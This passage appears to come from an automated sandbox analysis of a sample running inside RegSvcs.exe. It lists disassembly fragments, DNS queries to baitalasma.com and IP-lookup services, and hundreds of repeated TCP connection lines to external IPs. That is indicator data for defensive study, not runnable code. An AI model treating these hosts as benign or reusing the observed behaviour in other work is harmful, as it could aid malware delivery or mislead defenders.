                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D2B7D5h9_2_00D2B498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D22E59h9_2_00D22BB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D29459h9_2_00D291B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D23B61h9_2_00D238B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D21449h9_2_00D211A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D22151h9_2_00D21EA8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D28751h9_2_00D284A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D21CF9h9_2_00D21A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D22A01h9_2_00D22758
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]9_2_00D26258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D29001h9_2_00D28D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D202E9h9_2_00D20040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D2B2E9h9_2_00D2B040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]9_2_00D2624A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D20FF1h9_2_00D20D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D23709h9_2_00D23460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D29D09h9_2_00D29A60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D24411h9_2_00D24168
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D23FB9h9_2_00D23D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D225A9h9_2_00D22300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D28BA9h9_2_00D28900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D232B1h9_2_00D23008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D298B1h9_2_00D29608
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D2A5E1h9_2_00D2A338
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D282D1h9_2_00D28028
                  Source: global trafficDNS query: name: baitalasma.com
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 158.101.44.242:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 158.101.44.242:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 158.101.44.242:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 158.101.44.242:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 158.101.44.242:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 158.101.44.242:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
                  Source: global trafficTCP traffic: 38.242.255.115:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
                  Source: global trafficTCP traffic: 38.242.255.115:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 38.242.255.115:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
